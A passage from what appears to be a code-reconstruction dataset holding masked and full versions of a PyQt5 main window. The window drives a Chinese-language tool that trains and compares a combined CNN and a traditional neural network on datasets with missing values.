QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-5": "import sys\nfrom PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,\n QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\\\n showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\nclass MyMainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.windowLength = 1250\n self.windowHigh = 900\n\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.\n self.dataSetLossValue['New'] = 0.\n\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.\n self.dataSetLossValue['Tra'] = 0.\n\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n\n self.fullConnectOutInRate = 0.5\n\n self.mcbcnn = None\n self.trann = None\n\n self.trainingW = None\n self.trainingWT = None\n\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n ####### data module #######\n dataModule = QVBoxLayout()\n\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n\n\n ###### training module ########\n trainingModule = QVBoxLayout()\n\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n # self.setTrainingParametersButton = QPushButton('Trainning Parameters')\n # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n\n ############## new cnn result show ######\n resultShowModule = QVBoxLayout()\n\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n\n ################# new algorithm ui ##########\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(dataModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(trainingModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(resultShowModule)\n\n hboxTop.addStretch(1)\n\n #########traditional data module##########\n dataModuleT = QVBoxLayout()\n\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n\n ###### training module ########\n trainingModuleT = QVBoxLayout()\n\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n\n ############## traditional nn result show ######\n resultShowModuleT = QVBoxLayout()\n\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n\n ####### traditional algorithm #########\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(dataModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(trainingModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(resultShowModuleT)\n\n hboxBottom.addStretch(1)\n\n ########## whole frame layout ########\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet(\"QWidget { background-color: %s }\" % col.name())\n splitterLine.resize(splitterLine.sizeHint())\n\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n # vbox.addWidget(QLabel(str('_'*int(self.width()/3))))\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n\n self.setCentralWidget(mainWidget)\n\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n\n############ data load module #####################\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataName.setText(dataname)\n # self.presentDataName.resize(self.presentDataName.sizeHint())\n self.loadData()\n\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataNameT.setText(dataname)\n # self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n self.loadData()\n\n return\n\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])\n # print(self.dataFor['New'].DataTrainX, '\\n', self.dataFor['New'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = 